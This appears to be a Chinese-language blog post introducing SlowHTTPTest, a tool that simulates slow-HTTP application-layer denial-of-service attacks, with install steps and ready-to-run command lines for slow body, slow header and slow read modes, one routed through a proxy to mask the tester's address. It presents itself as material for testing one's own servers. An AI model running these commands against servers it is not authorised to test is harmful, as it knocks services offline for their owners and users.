SlowHTTPTest是一个高度可配置的工具,它通过以不同方式延长HTTP连接来模拟某些“应用程序层拒绝服务”攻击。用它来测试您的Web服务器的DoS漏洞,或者只是弄清楚它可以处理多少个并发连接。SlowHTTPTest可在大多数Linux平台,OS X和Cygwin(适用于Microsoft Windows的类似于Unix的环境和命令行界面)上运行, 编写此类文章的目的是为了介绍我们网络中的一些黑客攻击方法和被攻击后的现象来让大家认识到网络攻击究竟是怎样的,以此来加强大家的识别能力从而保护自己虚拟财产的安全,学技术不是为了搞破坏,而是为了更好的去保护我们祖国的网络安全!
- git clone https://github.com/shekyan/slowhttptest.git
- cd slowhttptest
- ./configure
- make && make install
测试从以下默认参数开始:
- 测试类型
- 连接数 50
- 地址 192.168.1.3
- 每秒连接数 50
- 随访数据之间的间隔 10秒
- 测试时间 240秒
- 探针连接超时 5秒
- 后续数据字段的最大长度 32字节
每个连接都会生成一个初始请求,其中包含:
- GET / HTTP/1.1
- Host: localhost:80
- User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2)
在慢消息正文模式下的用法示例:
- slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://x.x.x -x 10 -p 3
慢节奏模式下的用法示例:
- slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u http://x.x.x -x 24 -p 3
在慢速读取模式下使用示例,该示例通过xxxx:8080处的代理进行探测以使IP的网站可用性与您的IP地址不同:
- slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://x.x.x -p 5 -l 350 -e x.x.x.x:8080
根据详细程度,输出可以很简单,每5秒生成一次心跳消息,显示详细程度为1的连接状态,也可以为详细程度为4的完整流量转储
-g选项将基于Google图表工具生成CSV文件和交互式HTML。
这是生成的HTML页面的示例屏幕截图
github :https://github.com/shekyan/slowhttptest
与本站提供的代码或者工具从事任何有关违法犯罪行为或活动的仅由您自己承担。滥用本网站上的信息可能会导致,有关人员提起刑事诉讼。如果对滥用本工具中的信息以从事违法犯罪行为,被追究责任的后果自负,作者将不承担任何责任。
编写此类文章的目的是为了介绍我们网络中的一些黑客攻击方法和被攻击后的现象来让大家认识到网络攻击究竟是怎样的,以此来加强大家的识别能力从而保护自己虚拟财产的安全,学技术不是为了搞破坏,而是为了更好的去保护我们祖国的网络安全!